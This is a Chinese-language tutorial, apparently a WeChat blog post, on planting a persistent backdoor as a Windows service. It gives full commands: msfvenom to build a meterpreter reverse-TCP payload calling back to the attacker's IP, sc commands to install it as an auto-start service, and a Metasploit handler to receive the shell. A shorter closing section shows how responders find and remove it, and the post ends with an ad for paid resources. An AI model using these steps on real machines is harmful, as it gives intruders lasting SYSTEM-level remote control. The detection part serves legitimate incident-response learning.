一、Windows服务后门介绍

在Windows系统中还有一个重要的机制，就是服务。通常大部分的服务都拥有SYSTEM权限，如果攻击者利用Windows的服务机制创建一个后门服务，那么这个后门将比一般的持久化方法更为强健。

二、Windows服务后门-教程

前提条件: 假设在攻击的过程中通过利用各种getshell，已经拿到目标服务器administrator权限
靶机： windows Server2012

IP： 192.168.226.128
攻击机： kali

IP： 192.168.226.131

2.1 利用MSF生成一个EXE类型的后门木马

命令：

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.131 lport=8888 -f exe -o wxiaoge.exe #lhost是我们的主机ip，lport是我们主机的用于监听的端口

2.2 创建后门自启动服务

创建名字为ceshi的自启动服务命令：

sc create "ceshi" binpath= "C:UsersAdministratorDesktopwxiaoge.exe"sc description "ceshi" "ceshi"    #设置服务的描述字符串sc config "ceshi" start= auto           #设置这个服务为自动启动net start "ceshi"                       #启动服务

2.3 监听返回的shell

在kali上监听端口8888，马上就接收到目标机弹回来的shell，且目标机每次重启都会启动 ceshi 服务。

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.226.131set lport 8888exploit 

三、Windows服务后门——应急响应发现

3.1 查看网络连接

使用 TCPView 工具查看网络连接，未发现异常的连接，如下图所示，看来这个方法不能用了

3.2 查看服务器上所有的程序和服务

首先查看 everything（所有项目，意思是：全部的开机自启动项都在这）

然后查看 服务（意思是：全部的服务都在这）

查看这两处发现，有三个进程是可疑的“粉红色”
接下来查看所有的“粉红色”的程序，并且将程序放在微步云沙箱去检测，经检测发现c:usersadministratordesktopwxiaoge.exe文件为后门木马

注意：
粉色： 表示该条目对应的应用没有数字签名、签名不匹配或者没有发行商信息（可疑程序一般都是粉色）
黄色： 表示该启动条目对应的文件已经不存在了（可疑程序也可能是黄色）
绿色： 表示与之前保存的启动项配置比较，对比出来的差异将以绿色高亮进行显示。

处置：
1、删除ceshi服务和c:usersadministratordesktopwxiaoge.exe文件

更多资源：

1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程

3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程

收集整理在知识星球，可加入知识星球进行查看。也可搜索关注微信公众号：W小哥

原文始发于微信公众号（W小哥）：Windows留后门--教程（三）——Windows服务后门